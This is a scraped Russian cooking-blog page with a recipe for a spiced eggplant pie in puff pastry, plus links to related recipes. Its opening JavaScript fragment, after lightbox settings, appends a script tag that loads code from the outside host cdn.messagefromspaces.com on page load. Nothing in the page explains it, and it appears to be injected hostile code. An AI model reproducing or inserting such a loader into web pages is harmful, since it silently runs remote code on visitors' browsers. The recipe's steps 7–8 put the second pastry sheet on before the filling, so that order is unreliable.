, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Вкусно + Полезно

Пирог из баклажанов с пряностями


Exif_JPEG_420Если бы я жила в Индии, то была бы моментально и навсегда отнесена к беднейшим соцслоям этого общества…Почему? Потому что я обожаю баклажаны во всех их кулинарных проявлениях, даже в пирогах! А баклажаны в Индии едят только социально неимущие))) Рекомендую очень мой пирог с баклажанами в пряностях!

 

Чего и сколько берем:

1. Баклажаны — 2 шт

2. Помидоры — 600-700 гр

3. Лук репчатый — 2 шт

4. Перец болгарский — 1 шт

5. Оливки б/к — полбанки

6. Мята сушеная — 1 ст. ложка

7. Кумин молотый — 2 ч. ложки

8. Кетчуп Hienz — 2 ст. ложки

9. молотый красный перец — 1/2 ч. ложки

10. Орехи кедровые — кто любит и сколько хочет

11. Тесто слоеное  — 2 листа

 

Начинаем готовить:

1. Запекаем в разогретой духовке баклажаны до готовности. Они должны стать мягкими. Остужаем и мелко рубим

2. Репчатый лук режем очень мелко и обжариваем на масле виноградной косточки (не подумайте чего плохого! жарю только на нем)

3. Добавляем мелко нарезанный болгарский перец, кумин, мяту, молотый красный перец и сванскую соль по вкусу

4. Предварительно очищенные от шкурки помидоры мелко рубим и добавляем на сковороду с двумя ложками кетчупа

5. Через минутку выкладываем рубленные баклажаны и нарезанные оливки

6. Раскатываем тоненько один лист теста и кладем в выпечную форму

7. Посыпаем по желанию кедровыми орехами или кунжутом и сверху накрываем вторым раскатанным листом

8. Выкладываем начинку и аккуратно загибаем края теста

9. Выпекаем минут 30-40 при 200 градусах

ПРИЯТНОГО АППЕТИТА!

На эту тему вы можете почитать:

Кабачки в соусе кари
Картошка в меду и специях
Теплый салат из овощей

Тэги: , ,



Добавить комментарий